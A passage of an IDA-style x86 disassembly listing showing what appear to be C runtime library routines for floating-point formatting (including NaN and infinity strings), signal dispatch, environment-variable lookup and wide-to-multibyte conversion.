mov [eax], edi
jz loc_425651
push 18h
pop eax
cmp [ebp+var_4], eax
jbe short loc_425595
cmp [ebp+var_45], 5
jl short loc_425589
inc [ebp+var_45]
loc_425589: ; CODE XREF: sub_4251F1+393�j
mov [ebp+var_4], eax
mov eax, [ebp+var_C]
dec eax
inc [ebp+var_8]
jmp short loc_425598
; ---------------------------------------------------------------------------
loc_425595: ; CODE XREF: sub_4251F1+38D�j
mov eax, [ebp+var_C]
loc_425598: ; CODE XREF: sub_4251F1+3A2�j
cmp [ebp+var_4], 0
jbe loc_425647
loc_4255A2: ; CODE XREF: sub_4251F1+3BD�j
dec eax
cmp byte ptr [eax], 0
jnz short loc_4255B0
dec [ebp+var_4]
inc [ebp+var_8]
jmp short loc_4255A2
; ---------------------------------------------------------------------------
loc_4255B0: ; CODE XREF: sub_4251F1+3B5�j
lea eax, [ebp+var_40]
push eax
lea eax, [ebp+var_5C]
push [ebp+var_4]
push eax
call sub_42512A
mov eax, [ebp+var_1C]
xor ecx, ecx
add esp, 0Ch
cmp [ebp+var_18], ecx
jge short loc_4255CF
neg eax
loc_4255CF: ; CODE XREF: sub_4251F1+3DA�j
add eax, [ebp+var_8]
cmp [ebp+var_20], ecx
jnz short loc_4255DA
add eax, [ebp+arg_10]
loc_4255DA: ; CODE XREF: sub_4251F1+3E4�j
cmp [ebp+var_24], ecx
jnz short loc_4255E2
sub eax, [ebp+arg_14]
loc_4255E2: ; CODE XREF: sub_4251F1+3EC�j
cmp eax, 1450h
jle short loc_425619
mov [ebp+var_2C], 1
loc_4255F0: ; CODE XREF: sub_4251F1+436�j
mov ebx, [ebp+arg_8]
mov esi, [ebp+arg_8]
mov eax, [ebp+arg_8]
mov edx, [ebp+arg_8]
loc_4255FC: ; CODE XREF: sub_4251F1+454�j
; sub_4251F1+45E�j
cmp [ebp+var_2C], 0
jz short loc_425662
xor ebx, ebx
mov eax, 7FFFh
mov esi, 80000000h
xor edx, edx
mov [ebp+var_14], 2
jmp short loc_425677
; ---------------------------------------------------------------------------
loc_425619: ; CODE XREF: sub_4251F1+3F6�j
cmp eax, 0FFFFEBB0h
jge short loc_425629
mov [ebp+var_30], 1
jmp short loc_4255F0
; ---------------------------------------------------------------------------
loc_425629: ; CODE XREF: sub_4251F1+42D�j
push [ebp+arg_C]
push eax
lea eax, [ebp+var_40]
push eax
call sub_425DDA
mov edx, [ebp+var_40]
mov ebx, [ebp+var_40+2]
mov esi, [ebp+var_3A]
mov eax, [ebp+var_36]
add esp, 0Ch
jmp short loc_4255FC
; ---------------------------------------------------------------------------
loc_425647: ; CODE XREF: sub_4251F1+3AB�j
xor edx, edx
xor eax, eax
xor esi, esi
xor ebx, ebx
jmp short loc_4255FC
; ---------------------------------------------------------------------------
loc_425651: ; CODE XREF: sub_4251F1+381�j
xor edx, edx
xor eax, eax
xor esi, esi
xor ebx, ebx
mov [ebp+var_14], 4
jmp short loc_425677
; ---------------------------------------------------------------------------
loc_425662: ; CODE XREF: sub_4251F1+40F�j
cmp [ebp+var_30], 0
jz short loc_425677
xor edx, edx
xor eax, eax
xor esi, esi
xor ebx, ebx
mov [ebp+var_14], 1
loc_425677: ; CODE XREF: sub_4251F1+426�j
; sub_4251F1+46F�j ...
mov ecx, [ebp+arg_0]
or eax, [ebp+var_28]
pop edi
mov [ecx+6], esi
mov [ecx+2], ebx
mov [ecx+0Ah], ax
mov eax, [ebp+var_14]
pop esi
mov [ecx], dx
pop ebx
leave
retn
sub_4251F1 endp
; ---------------------------------------------------------------------------
off_425692 dd offset loc_42525B ; DATA XREF: sub_4251F1+63�r
dd offset loc_4252AA ; jump table for switch statement
dd offset loc_425301
dd offset loc_42532B
dd offset loc_425386
dd offset loc_4253FD
dd offset loc_425433
dd offset loc_42547D
dd offset loc_42545C
dd offset loc_4254E1
dd offset loc_4254CB
dd offset loc_425497
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4256C2 proc near ; CODE XREF: sub_4245E9+2C�p
var_1C = byte ptr -1Ch
var_1B = byte ptr -1Bh
var_1A = byte ptr -1Ah
var_19 = byte ptr -19h
var_18 = byte ptr -18h
var_17 = byte ptr -17h
var_16 = byte ptr -16h
var_15 = byte ptr -15h
var_14 = byte ptr -14h
var_13 = byte ptr -13h
var_12 = byte ptr -12h
var_11 = byte ptr -11h
var_10 = word ptr -10h
var_E = dword ptr -0Eh
var_A = dword ptr -0Ah
var_6 = word ptr -6
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = byte ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 1Ch
mov eax, [ebp+arg_8]
push ebx
mov ebx, [ebp+arg_14]
push esi
mov ecx, eax
mov esi, 7FFFh
and ecx, 8000h
and eax, esi
test cx, cx
push edi
mov [ebp+var_1C], 0CCh
mov [ebp+var_1B], 0CCh
mov [ebp+var_1A], 0CCh
mov [ebp+var_19], 0CCh
mov [ebp+var_18], 0CCh
mov [ebp+var_17], 0CCh
mov [ebp+var_16], 0CCh
mov [ebp+var_15], 0CCh
mov [ebp+var_14], 0CCh
mov [ebp+var_13], 0CCh
mov [ebp+var_12], 0FBh
mov [ebp+var_11], 3Fh
mov [ebp+var_4], 1
mov edx, eax
jz short loc_425724
mov byte ptr [ebx+2], 2Dh
jmp short loc_425728
; ---------------------------------------------------------------------------
loc_425724: ; CODE XREF: sub_4256C2+5A�j
mov byte ptr [ebx+2], 20h
loc_425728: ; CODE XREF: sub_4256C2+60�j
mov edi, [ebp+arg_4]
test dx, dx
jnz short loc_42574E
test edi, edi
jnz short loc_42574E
cmp [ebp+arg_0], edi
jnz short loc_42574E
loc_425739: ; CODE XREF: sub_4256C2+181�j
and word ptr [ebx], 0
mov byte ptr [ebx+2], 20h
mov byte ptr [ebx+3], 1
mov byte ptr [ebx+4], 30h
jmp loc_42594C
; ---------------------------------------------------------------------------
loc_42574E: ; CODE XREF: sub_4256C2+6C�j
; sub_4256C2+70�j ...
cmp dx, si
jnz short loc_4257CD
mov eax, 80000000h
mov word ptr [ebx], 1
cmp edi, eax
jnz short loc_425767
cmp [ebp+arg_0], 0
jz short loc_425776
loc_425767: ; CODE XREF: sub_4256C2+9D�j
test edi, 40000000h
jnz short loc_425776
push offset a1Snan ; "1#SNAN"
jmp short loc_4257BC
; ---------------------------------------------------------------------------
loc_425776: ; CODE XREF: sub_4256C2+A3�j
; sub_4256C2+AB�j
test cx, cx
jz short loc_425790
cmp edi, 0C0000000h
jnz short loc_425790
cmp [ebp+arg_0], 0
jnz short loc_4257B7
push offset a1Ind ; "1#IND"
jmp short loc_42579F
; ---------------------------------------------------------------------------
loc_425790: ; CODE XREF: sub_4256C2+B7�j
; sub_4256C2+BF�j
cmp edi, eax
jnz short loc_4257B7
cmp [ebp+arg_0], 0
jnz short loc_4257B7
push offset a1Inf ; "1#INF"
loc_42579F: ; CODE XREF: sub_4256C2+CC�j
lea eax, [ebx+4]
push eax
call sub_41BEB0
pop ecx
mov byte ptr [ebx+3], 5
pop ecx
loc_4257AE: ; CODE XREF: sub_4256C2+109�j
and [ebp+var_4], 0
jmp loc_425925
; ---------------------------------------------------------------------------
loc_4257B7: ; CODE XREF: sub_4256C2+C5�j
; sub_4256C2+D0�j ...
push offset a1Qnan ; "1#QNAN"
loc_4257BC: ; CODE XREF: sub_4256C2+B2�j
lea eax, [ebx+4]
push eax
call sub_41BEB0
pop ecx
mov byte ptr [ebx+3], 6
pop ecx
jmp short loc_4257AE
; ---------------------------------------------------------------------------
loc_4257CD: ; CODE XREF: sub_4256C2+8F�j
movzx eax, dx
mov ecx, edi
mov esi, eax
shr ecx, 18h
imul eax, 4D10h
shr esi, 8
and [ebp+var_10], 0
push 1
lea ecx, [esi+ecx*2]
mov [ebp+var_6], dx
imul ecx, 4Dh
mov [ebp+var_A], edi
lea esi, [ecx+eax-134312F4h]
mov eax, [ebp+arg_0]
sar esi, 10h
mov [ebp+var_E], eax
movsx eax, si
neg eax
push eax
lea eax, [ebp+var_10]
push eax
call sub_425DDA
add esp, 0Ch
cmp [ebp+var_6], 3FFFh
jb short loc_42582E
lea eax, [ebp+var_1C]
inc esi
push eax
lea eax, [ebp+var_10]
push eax
call sub_425BBA
pop ecx
pop ecx
loc_42582E: ; CODE XREF: sub_4256C2+15A�j
test [ebp+arg_10], 1
mov [ebx], si
jz short loc_425848
mov edi, [ebp+arg_C]
movsx eax, si
add edi, eax
test edi, edi
jg short loc_42584B
jmp loc_425739
; ---------------------------------------------------------------------------
loc_425848: ; CODE XREF: sub_4256C2+173�j
mov edi, [ebp+arg_C]
loc_42584B: ; CODE XREF: sub_4256C2+17F�j
cmp edi, 15h
jle short loc_425853
push 15h
pop edi
loc_425853: ; CODE XREF: sub_4256C2+18C�j
movzx esi, [ebp+var_6]
sub esi, 3FFEh
and [ebp+var_6], 0
mov [ebp+arg_14], 8
loc_425869: ; CODE XREF: sub_4256C2+1B4�j
lea eax, [ebp+var_10]
push eax
call sub_4250CF
dec [ebp+arg_14]
pop ecx
jnz short loc_425869
test esi, esi
jge short loc_425893
neg esi
and esi, 0FFh
jle short loc_425893
loc_425886: ; CODE XREF: sub_4256C2+1CF�j
lea eax, [ebp+var_10]
push eax
call sub_4250FD
dec esi
pop ecx
jnz short loc_425886
loc_425893: ; CODE XREF: sub_4256C2+1B8�j
; sub_4256C2+1C2�j
lea ecx, [edi+1]
lea eax, [ebx+4]
test ecx, ecx
mov [ebp+arg_14], eax
jle short loc_4258F0
mov [ebp+arg_C], ecx
loc_4258A3: ; CODE XREF: sub_4256C2+229�j
lea esi, [ebp+var_10]
lea edi, [ebp+arg_0]
movsd
movsd
lea eax, [ebp+var_10]
push eax
movsd
call sub_4250CF
lea eax, [ebp+var_10]
push eax
call sub_4250CF
lea eax, [ebp+arg_0]
push eax
lea eax, [ebp+var_10]
push eax
call sub_425071
lea eax, [ebp+var_10]
push eax
call sub_4250CF
mov al, byte ptr [ebp+var_6+1]
mov ecx, [ebp+arg_14]
and byte ptr [ebp+var_6+1], 0
add esp, 14h
add al, 30h
inc [ebp+arg_14]
dec [ebp+arg_C]
mov [ecx], al
jnz short loc_4258A3
mov eax, [ebp+arg_14]
loc_4258F0: ; CODE XREF: sub_4256C2+1DC�j
mov cl, [eax-1]
dec eax
dec eax
cmp cl, 35h
lea ecx, [ebx+4]
jl short loc_42592D
loc_4258FD: ; CODE XREF: sub_4256C2+248�j
cmp eax, ecx
jb short loc_425910
cmp byte ptr [eax], 39h
jnz short loc_42590C
mov byte ptr [eax], 30h
dec eax
jmp short loc_4258FD
; ---------------------------------------------------------------------------
loc_42590C: ; CODE XREF: sub_4256C2+242�j
cmp eax, ecx
jnb short loc_425914
loc_425910: ; CODE XREF: sub_4256C2+23D�j
inc eax
inc word ptr [ebx]
loc_425914: ; CODE XREF: sub_4256C2+24C�j
inc byte ptr [eax]
loc_425916: ; CODE XREF: sub_4256C2+279�j
sub al, bl
sub al, 3
mov [ebx+3], al
movsx eax, al
and byte ptr [eax+ebx+4], 0
loc_425925: ; CODE XREF: sub_4256C2+F0�j
mov eax, [ebp+var_4]
loc_425928: ; CODE XREF: sub_4256C2+291�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_42592D: ; CODE XREF: sub_4256C2+239�j
; sub_4256C2+275�j
cmp eax, ecx
jb short loc_42593D
cmp byte ptr [eax], 30h
jnz short loc_425939
dec eax
jmp short loc_42592D
; ---------------------------------------------------------------------------
loc_425939: ; CODE XREF: sub_4256C2+272�j
cmp eax, ecx
jnb short loc_425916
loc_42593D: ; CODE XREF: sub_4256C2+26D�j
and word ptr [ebx], 0
mov byte ptr [ebx+2], 20h
mov byte ptr [ebx+3], 1
mov byte ptr [ecx], 30h
loc_42594C: ; CODE XREF: sub_4256C2+87�j
and byte ptr [ebx+5], 0
push 1
pop eax
jmp short loc_425928
sub_4256C2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_425955 proc near ; CODE XREF: sub_42255C+226D�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push esi
push edi
mov edi, [ebp+arg_0]
mov eax, edi
dec eax
dec eax
jz short loc_4259BC
dec eax
dec eax
jz short loc_4259AD
sub eax, 4
jz short loc_4259AD
sub eax, 3
jz short loc_4259AD
sub eax, 4
jz short loc_4259A0
sub eax, 6
jz short loc_425993
dec eax
jz short loc_425986
or eax, 0FFFFFFFFh
jmp loc_425A7E
; ---------------------------------------------------------------------------
loc_425986: ; CODE XREF: sub_425955+27�j
mov esi, ds:dword_4DBC5C
mov eax, offset dword_4DBC5C
jmp short loc_4259C7
; ---------------------------------------------------------------------------
loc_425993: ; CODE XREF: sub_425955+24�j
mov esi, ds:dword_4DBC58
mov eax, offset dword_4DBC58
jmp short loc_4259C7
; ---------------------------------------------------------------------------
loc_4259A0: ; CODE XREF: sub_425955+1F�j
mov esi, ds:dword_4DBC60
mov eax, offset dword_4DBC60
jmp short loc_4259C7
; ---------------------------------------------------------------------------
loc_4259AD: ; CODE XREF: sub_425955+10�j
; sub_425955+15�j ...
push edi
call sub_425A82
mov esi, [eax+8]
add eax, 8
pop ecx
jmp short loc_4259C7
; ---------------------------------------------------------------------------
loc_4259BC: ; CODE XREF: sub_425955+C�j
mov esi, ds:dword_4DBC54
mov eax, offset dword_4DBC54
loc_4259C7: ; CODE XREF: sub_425955+3C�j
; sub_425955+49�j ...
cmp esi, 1
jnz short loc_4259D3
xor eax, eax
jmp loc_425A7E
; ---------------------------------------------------------------------------
loc_4259D3: ; CODE XREF: sub_425955+75�j
test esi, esi
jnz short loc_4259DE
push 3
call sub_41B7C2
loc_4259DE: ; CODE XREF: sub_425955+80�j
push ebx
push 8
pop ecx
cmp edi, ecx
jz short loc_4259F0
cmp edi, 0Bh
jz short loc_4259F0
cmp edi, 4
jnz short loc_425A16
loc_4259F0: ; CODE XREF: sub_425955+8F�j
; sub_425955+94�j
mov ebx, ds:dword_4DBA30
and ds:dword_4DBA30, 0
cmp edi, ecx
jnz short loc_425A45
mov edx, dword_43D02C
mov dword_43D02C, 8Ch
mov [ebp+arg_0], edx
jmp short loc_425A19
; ---------------------------------------------------------------------------
loc_425A16: ; CODE XREF: sub_425955+99�j
mov ebx, [ebp+arg_0]
loc_425A19: ; CODE XREF: sub_425955+BF�j
cmp edi, ecx
jnz short loc_425A45
mov eax, dword_43D020
mov ecx, dword_43D024
add ecx, eax
cmp eax, ecx
jge short loc_425A4C
lea edx, [eax+eax*2]
sub ecx, eax
lea edx, ds:43CFB0h[edx*4]
loc_425A3A: ; CODE XREF: sub_425955+EC�j
and dword ptr [edx], 0
add edx, 0Ch
dec ecx
jnz short loc_425A3A
jmp short loc_425A4C
; ---------------------------------------------------------------------------
loc_425A45: ; CODE XREF: sub_425955+AA�j
; sub_425955+C6�j
and dword ptr [eax], 0
cmp edi, ecx
jnz short loc_425A5A
loc_425A4C: ; CODE XREF: sub_425955+D7�j
; sub_425955+EE�j
push dword_43D02C
push 8
call esi
pop ecx
pop ecx
jmp short loc_425A68
; ---------------------------------------------------------------------------
loc_425A5A: ; CODE XREF: sub_425955+F5�j
push edi
call esi
cmp edi, 0Bh
pop ecx
jz short loc_425A68
cmp edi, 4
jnz short loc_425A7B
loc_425A68: ; CODE XREF: sub_425955+103�j
; sub_425955+10C�j
cmp edi, 8
mov ds:dword_4DBA30, ebx
jnz short loc_425A7B
mov eax, [ebp+arg_0]
mov dword_43D02C, eax
loc_425A7B: ; CODE XREF: sub_425955+111�j
; sub_425955+11C�j
xor eax, eax
pop ebx
loc_425A7E: ; CODE XREF: sub_425955+2C�j
; sub_425955+79�j
pop edi
pop esi
pop ebp
retn
sub_425955 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_425A82 proc near ; CODE XREF: sub_425955+59�p
arg_0 = dword ptr 4
mov edx, [esp+arg_0]
mov ecx, dword_43D028
cmp dword_43CFAC, edx
push esi
mov eax, offset dword_43CFA8
jz short loc_425AB0
lea esi, [ecx+ecx*2]
lea esi, ds:43CFA8h[esi*4]
loc_425AA4: ; CODE XREF: sub_425A82+2C�j
add eax, 0Ch
cmp eax, esi
jnb short loc_425AB0
cmp [eax+4], edx
jnz short loc_425AA4
loc_425AB0: ; CODE XREF: sub_425A82+16�j
; sub_425A82+27�j
lea ecx, [ecx+ecx*2]
pop esi
lea ecx, ds:43CFA8h[ecx*4]
cmp eax, ecx
jnb short loc_425AC4
cmp [eax+4], edx
jz short locret_425AC6
loc_425AC4: ; CODE XREF: sub_425A82+3B�j
xor eax, eax
locret_425AC6: ; CODE XREF: sub_425A82+40�j
retn
sub_425A82 endp
; =============== S U B R O U T I N E =======================================
sub_425AC7 proc near ; CODE XREF: sub_4247EC+23�p
arg_0 = dword ptr 4
cmp ds:dword_4DCFF0, 0
push ebx
push esi
mov esi, ds:dword_4DB980
push edi
jz short loc_425B3E
test esi, esi
jnz short loc_425AF8
cmp ds:dword_4DB988, esi
jz short loc_425B3E
call sub_425E95
test eax, eax
jnz short loc_425B3E
mov esi, ds:dword_4DB980
test esi, esi
jz short loc_425B3E
loc_425AF8: ; CODE XREF: sub_425AC7+14�j
mov ebx, [esp+0Ch+arg_0]
test ebx, ebx
jz short loc_425B3E
push ebx
call sub_41AFE0
pop ecx
mov edi, eax
loc_425B09: ; CODE XREF: sub_425AC7+6D�j
mov eax, [esi]
test eax, eax
jz short loc_425B3E
push eax
call sub_41AFE0
cmp eax, edi
pop ecx
jbe short loc_425B31
mov eax, [esi]
cmp byte ptr [eax+edi], 3Dh
jnz short loc_425B31
push edi
push ebx
push eax
call sub_425E56
add esp, 0Ch
test eax, eax
jz short loc_425B36
loc_425B31: ; CODE XREF: sub_425AC7+51�j
; sub_425AC7+59�j
add esi, 4
jmp short loc_425B09
; ---------------------------------------------------------------------------
loc_425B36: ; CODE XREF: sub_425AC7+68�j
mov eax, [esi]
lea eax, [eax+edi+1]
jmp short loc_425B40
; ---------------------------------------------------------------------------
loc_425B3E: ; CODE XREF: sub_425AC7+10�j
; sub_425AC7+1C�j ...
xor eax, eax
loc_425B40: ; CODE XREF: sub_425AC7+75�j
pop edi
pop esi
pop ebx
retn
sub_425AC7 endp
; =============== S U B R O U T I N E =======================================
sub_425B44 proc near ; CODE XREF: sub_424F0A+8B�p
; sub_424F0A+D9�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
push esi
cmp eax, ds:dword_4DCDA0
jnb short loc_425BAB
mov ecx, eax
and eax, 1Fh
sar ecx, 5
mov ecx, ds:dword_4DCCA0[ecx*4]
lea edx, [ecx+eax*8+4]
mov cl, [ecx+eax*8+4]
test cl, 1
jz short loc_425BAB
mov al, cl
mov esi, 8000h
and eax, 80h
cmp [esp+4+arg_4], esi
jnz short loc_425B84
and cl, 7Fh
jmp short loc_425B91
; ---------------------------------------------------------------------------
loc_425B84: ; CODE XREF: sub_425B44+39�j
cmp [esp+4+arg_4], 4000h
jnz short loc_425B9F
or cl, 80h
loc_425B91: ; CODE XREF: sub_425B44+3E�j
neg eax
sbb eax, eax
mov [edx], cl
and ax, 0C000h
add eax, esi
pop esi
retn
; ---------------------------------------------------------------------------
loc_425B9F: ; CODE XREF: sub_425B44+48�j
mov ds:dword_4DB958, 16h
jmp short loc_425BB5
; ---------------------------------------------------------------------------
loc_425BAB: ; CODE XREF: sub_425B44+B�j
; sub_425B44+27�j
mov ds:dword_4DB958, 9
loc_425BB5: ; CODE XREF: sub_425B44+65�j
or eax, 0FFFFFFFFh
pop esi
retn
sub_425B44 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_425BBA proc near ; CODE XREF: sub_4256C2+165�p
; sub_425DDA+69�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 24h
push ebx
mov ebx, [ebp+arg_4]
push esi
mov esi, [ebp+arg_0]
mov cx, [ebx+0Ah]
xor eax, eax
push edi
mov [ebp+var_14], eax
mov [ebp+var_24], eax
mov [ebp+var_20], eax
mov [ebp+var_1C], eax
mov ax, [esi+0Ah]
mov edi, ecx
mov edx, 7FFFh
xor edi, eax
and eax, edx
and ecx, edx
and edi, 8000h
cmp ax, 7FFFh
lea edx, [ecx+eax]
mov [ebp+arg_0], edx
jnb loc_425DBA
cmp cx, 7FFFh
jnb loc_425DBA
cmp dx, 0BFFDh
ja loc_425DBA
cmp dx, 3FBFh
ja short loc_425C23
xor eax, eax
jmp short loc_425C5D
; ---------------------------------------------------------------------------
loc_425C23: ; CODE XREF: sub_425BBA+63�j
test ax, ax
mov edx, 7FFFFFFFh
jnz short loc_425C45
inc [ebp+arg_0]
test [esi+8], edx
jnz short loc_425C45
xor eax, eax
cmp [esi+4], eax
jnz short loc_425C47
cmp [esi], eax
jnz short loc_425C47
jmp loc_425DB4
; ---------------------------------------------------------------------------
loc_425C45: ; CODE XREF: sub_425BBA+71�j
; sub_425BBA+79�j
xor eax, eax
loc_425C47: ; CODE XREF: sub_425BBA+80�j
; sub_425BBA+84�j
cmp cx, ax
jnz short loc_425C6A
inc [ebp+arg_0]
test [ebx+8], edx
jnz short loc_425C6A
cmp [ebx+4], eax
jnz short loc_425C6A
cmp [ebx], eax
jnz short loc_425C6A
loc_425C5D: ; CODE XREF: sub_425BBA+67�j
mov [esi+8], eax
mov [esi+4], eax
mov [esi], eax
jmp loc_425DD5
; ---------------------------------------------------------------------------
loc_425C6A: ; CODE XREF: sub_425BBA+90�j
; sub_425BBA+98�j ...
mov [ebp+var_10], eax
lea eax, [ebp+var_20]
mov [ebp+var_4], eax
mov [ebp+arg_4], 5
loc_425C7A: ; CODE XREF: sub_425BBA+122�j
mov eax, [ebp+var_10]
add eax, eax
cmp [ebp+arg_4], 0
jle short loc_425CCE
add eax, esi
lea ecx, [ebx+8]
mov [ebp+var_8], eax
mov eax, [ebp+arg_4]
mov [ebp+var_C], ecx
mov [ebp+var_18], eax
loc_425C96: ; CODE XREF: sub_425BBA+112�j
mov eax, [ebp+var_8]
mov ecx, [ebp+var_C]
movzx eax, word ptr [eax]
movzx ecx, word ptr [ecx]
imul eax, ecx
mov ecx, [ebp+var_4]
add ecx, 0FFFFFFFCh
push ecx
push eax
push dword ptr [ecx]
call sub_425050
add esp, 0Ch
test eax, eax
jz short loc_425CC1
mov eax, [ebp+var_4]
inc word ptr [eax]
loc_425CC1: ; CODE XREF: sub_425BBA+FF�j
add [ebp+var_8], 2
sub [ebp+var_C], 2
dec [ebp+var_18]
jnz short loc_425C96
loc_425CCE: ; CODE XREF: sub_425BBA+C9�j
add [ebp+var_4], 2
inc [ebp+var_10]
dec [ebp+arg_4]
cmp [ebp+arg_4], 0
jg short loc_425C7A
add [ebp+arg_0], 0C002h
cmp word ptr [ebp+arg_0], 0
jle short loc_425D11
loc_425CEC: ; CODE XREF: sub_425BBA+14E�j
test byte ptr [ebp+var_1C+3], 80h
jnz short loc_425D0A
lea eax, [ebp+var_24]
push eax
call sub_4250CF
add [ebp+arg_0], 0FFFFh
pop ecx
cmp word ptr [ebp+arg_0], 0
jg short loc_425CEC
loc_425D0A: ; CODE XREF: sub_425BBA+136�j
cmp word ptr [ebp+arg_0], 0
jg short loc_425D4A
loc_425D11: ; CODE XREF: sub_425BBA+130�j
add [ebp+arg_0], 0FFFFh
cmp word ptr [ebp+arg_0], 0
jge short loc_425D4A
movsx eax, word ptr [ebp+arg_0]
neg eax
add [ebp+arg_0], eax
mov ebx, eax
loc_425D2A: ; CODE XREF: sub_425BBA+184�j
test byte ptr [ebp+var_24], 1
jz short loc_425D33
inc [ebp+var_14]
loc_425D33: ; CODE XREF: sub_425BBA+174�j
lea eax, [ebp+var_24]
push eax
call sub_4250FD
dec ebx
pop ecx
jnz short loc_425D2A
cmp [ebp+var_14], 0
jz short loc_425D4A
or byte ptr [ebp+var_24], 1
loc_425D4A: ; CODE XREF: sub_425BBA+155�j
; sub_425BBA+163�j ...
cmp word ptr [ebp+var_24], 8000h
ja short loc_425D61
mov eax, [ebp+var_24]
and eax, 1FFFFh
cmp eax, 18000h
jnz short loc_425D96
loc_425D61: ; CODE XREF: sub_425BBA+196�j
cmp [ebp+var_24+2], 0FFFFFFFFh
jnz short loc_425D93
and [ebp+var_24+2], 0
cmp [ebp+var_20+2], 0FFFFFFFFh
jnz short loc_425D8E
and [ebp+var_20+2], 0
cmp word ptr [ebp+var_1C+2], 0FFFFh
jnz short loc_425D88
inc [ebp+arg_0]
mov word ptr [ebp+var_1C+2], 8000h
jmp short loc_425D96
; ---------------------------------------------------------------------------
loc_425D88: ; CODE XREF: sub_425BBA+1C1�j
inc word ptr [ebp+var_1C+2]
jmp short loc_425D96
; ---------------------------------------------------------------------------
loc_425D8E: ; CODE XREF: sub_425BBA+1B5�j
inc [ebp+var_20+2]
jmp short loc_425D96
; ---------------------------------------------------------------------------
loc_425D93: ; CODE XREF: sub_425BBA+1AB�j
inc [ebp+var_24+2]
loc_425D96: ; CODE XREF: sub_425BBA+1A5�j
; sub_425BBA+1CC�j ...
mov eax, [ebp+arg_0]
cmp ax, 7FFFh
jnb short loc_425DBA
mov cx, word ptr [ebp+var_24+2]
or eax, edi
mov [esi], cx
mov ecx, [ebp+var_20]
mov [esi+2], ecx
mov ecx, [ebp+var_1C]
mov [esi+6], ecx
loc_425DB4: ; CODE XREF: sub_425BBA+86�j
mov [esi+0Ah], ax
jmp short loc_425DD5
; ---------------------------------------------------------------------------
loc_425DBA: ; CODE XREF: sub_425BBA+42�j
; sub_425BBA+4D�j ...
neg di
sbb edi, edi
and dword ptr [esi+4], 0
and edi, 80000000h
add edi, 7FFF8000h
and dword ptr [esi], 0
mov [esi+8], edi
loc_425DD5: ; CODE XREF: sub_425BBA+AB�j
; sub_425BBA+1FE�j
pop edi
pop esi
pop ebx
leave
retn
sub_425BBA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_425DDA proc near ; CODE XREF: sub_4251F1+440�p
; sub_4256C2+14C�p
var_C = byte ptr -0Ch
var_A = dword ptr -0Ah
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
push ebx
mov ebx, offset dword_43D4A8
xor ecx, ecx
sub ebx, 60h
cmp [ebp+arg_4], ecx
jz short loc_425E53
jge short loc_425E02
mov eax, [ebp+arg_4]
mov ebx, offset dword_43D608
neg eax
mov [ebp+arg_4], eax
sub ebx, 60h
loc_425E02: ; CODE XREF: sub_425DDA+16�j
cmp [ebp+arg_8], ecx
jnz short loc_425E0D
mov eax, [ebp+arg_0]
mov [eax], cx
loc_425E0D: ; CODE XREF: sub_425DDA+2B�j
cmp [ebp+arg_4], ecx
jz short loc_425E53
push esi
push edi
loc_425E14: ; CODE XREF: sub_425DDA+75�j
mov eax, [ebp+arg_4]
add ebx, 54h
sar [ebp+arg_4], 3
and eax, 7
cmp eax, ecx
jz short loc_425E4C
lea eax, [eax+eax*2]
cmp word ptr [ebx+eax*4], 8000h
lea esi, [ebx+eax*4]
jb short loc_425E3F
lea edi, [ebp+var_C]
movsd
movsd
movsd
dec [ebp+var_A]
lea esi, [ebp+var_C]
loc_425E3F: ; CODE XREF: sub_425DDA+57�j
push esi
push [ebp+arg_0]
call sub_425BBA
pop ecx
pop ecx
xor ecx, ecx
loc_425E4C: ; CODE XREF: sub_425DDA+49�j
cmp [ebp+arg_4], ecx
jnz short loc_425E14
pop edi
pop esi
loc_425E53: ; CODE XREF: sub_425DDA+14�j
; sub_425DDA+36�j
pop ebx
leave
retn
sub_425DDA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_425E56 proc near ; CODE XREF: sub_425AC7+5E�p
; sub_426332+18�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
cmp [ebp+arg_8], 0
jnz short loc_425E63
xor eax, eax
pop ebp
retn
; ---------------------------------------------------------------------------
loc_425E63: ; CODE XREF: sub_425E56+7�j
push ds:dword_4DCDA4
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_8]
push [ebp+arg_0]
push 1
push ds:dword_4DCFC4
call sub_425F03
add esp, 1Ch
test eax, eax
jnz short loc_425E90
mov eax, 7FFFFFFFh
pop ebp
retn
; ---------------------------------------------------------------------------
loc_425E90: ; CODE XREF: sub_425E56+31�j
add eax, 0FFFFFFFEh
pop ebp
retn
sub_425E56 endp
; =============== S U B R O U T I N E =======================================
sub_425E95 proc near ; CODE XREF: sub_425AC7+1E�p
; sub_4261AB+5B�p
var_4 = dword ptr -4
push ecx
push ebx
push ebp
push esi
mov esi, ds:dword_4DB988
push edi
xor edi, edi
mov eax, [esi]
cmp eax, edi
jz short loc_425EF6
mov ebx, dword_42717C
loc_425EAE: ; CODE XREF: sub_425E95+5F�j
push edi
push edi
push edi
push edi
push 0FFFFFFFFh
push eax
push edi
push 1
call ebx ; WideCharToMultiByte
mov ebp, eax
cmp ebp, edi
jz short loc_425EFE
push ebp
call sub_41B4D5
cmp eax, edi
pop ecx
mov [esp+14h+var_4], eax
jz short loc_425EFE
push edi
push edi
push ebp
push eax
push 0FFFFFFFFh
push dword ptr [esi]
push edi
push 1
call ebx ; WideCharToMultiByte
test eax, eax
jz short loc_425EFE
push edi
push [esp+18h+var_4]
call sub_4261AB
